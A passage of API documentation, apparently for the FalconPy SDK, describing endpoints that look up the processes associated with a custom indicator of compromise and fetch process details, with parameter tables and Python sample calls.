print(response)Back to Table of Contents
Search for processes associated with a custom IOC
This operation has been superseded by the indicator_get_processes_ran_on_v1 operation.
processes_ran_on_legacy
| Method | Route |
|---|---|
|
/indicators/queries/processes/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| type |
|
|
query | string | The type of the indicator. Valid types include:
|
| value |
|
|
query | string | The string representation of the indicator. |
| device_id |
|
|
query | string | Specify a Host AID to return only processes from that host. |
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | integer | Starting offset to begin returning results. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.processes_ran_on_legacy(type="string",
value="string",
device_id="string",
limit="string",
offset="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.ProcessesRanOn(type="string",
value="string",
device_id="string",
limit="string",
offset="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("ProcessesRanOn",
type="string",
value="string",
device_id="string",
limit="string",
offset="string"
)
print(response)Back to Table of Contents
Search for processes associated with a custom IOC
processes_ran_on or (indicator_get_processes_ran_on_v1)
| Method | Route |
|---|---|
|
/iocs/queries/indicators/processes/v1 |
- Consumes: application/json
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| type |
|
|
query | string | The type of the indicator. Valid types include:
|
| value |
|
|
query | string | The string representation of the indicator. |
| device_id |
|
|
query | string | Specify a Host AID to return only processes from that host. |
| limit |
|
|
query | integer | Maximum number of results to return. |
| offset |
|
|
query | integer | Starting offset to begin returning results. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.processes_ran_on(type="string",
value="string",
device_id="string",
limit="string",
offset="string"
)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.indicator_get_processes_ran_on_v1(type="string",
value="string",
device_id="string",
limit="string",
offset="string"
)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
response = falcon.command("indicator_get_processes_ran_on_v1",
type="string",
value="string",
device_id="string",
limit="string",
offset="string"
)
print(response)Back to Table of Contents
For the provided ProcessID retrieve the process details
entities_processes
| Method | Route |
|---|---|
|
/processes/entities/processes/v1 |
- Produces: application/json
| Name | Service | Uber | Type | Data type | Description |
|---|---|---|---|---|---|
| ids |
|
|
query | string or list of strings | ProcessID for the running process you want to lookup. |
| parameters |
|
|
query | dictionary | Full query string parameters payload in JSON format. |
from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.entities_processes(ids=id_list)
print(response)from falconpy import IOC
# Do not hardcode API credentials!
falcon = IOC(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.entities_processes(ids=id_list)
print(response)from falconpy import APIHarnessV2
# Do not hardcode API credentials!
falcon = APIHarnessV2(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET
)
id_list = 'ID1,ID2,ID3' # Can also pass a list here: ['ID1', 'ID2', 'ID3']
response = falcon.command("entities_processes", ids=id_list)
print(response)Back to Table of Contents
